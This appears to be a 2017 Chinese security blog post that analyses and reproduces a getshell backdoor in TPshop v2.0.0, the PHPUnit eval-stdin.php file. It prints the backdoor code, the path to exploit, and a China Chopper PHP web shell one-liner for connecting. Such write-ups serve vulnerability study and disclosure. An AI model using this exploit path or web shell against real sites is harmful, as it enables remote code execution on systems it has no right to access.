客服QQ:872490018 服务时间:9:00-21:00
i春秋学院
培育信息时代的安全感

当前位置:首页 > 安全 > 技术 > 正文

TPshop商城 Getshell后门文件分析与复现
作者:
2017年11月14日 15:14:22
1174 次阅读
来源: 爱尖刀

本文作者:i春秋签约作家——Laimooc

官网地址:http://www.tp-shop.cn/

影响版本:TPSHOP v2.0.0

后门文件:eval-stdin.php 内容:

<?php  eval('?>' . file_get_contents('php://input')); ?>

分析:

使用

file_get_contents('php://input'))

接收POST请求的原始数据流

eval函数来执行。

我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不:

利用方法:

访问后门文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post请求发送数据即可实现getshell。

那么问题来了,既然可以执行php代码,那么我们就直接配置菜刀连接.

采用写入的话就有点麻烦了。

地址:

http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

配置:

<O>
<?php eval($_POST[c]);?>
</O>


[广告]赞助链接:

舆情监测,互联网舆情首选查舆情:http://www.chayuqing.com/
四季很好,只要有你,文娱排行榜:http://www.yaopaiming.com/

  • 网络尖刀
    公众号:mcbang_com
    数据、技术、运营
  • 知安
    公众号:knowsafe
    黑客、技术、安全
  • 查舆情
    公众号:chayuqing_com
    舆情、文娱、品牌

Copyright © 2013 IjianDao.Com,All Rights Reserved

网络尖刀 版权所有 京ICP备14006288号-3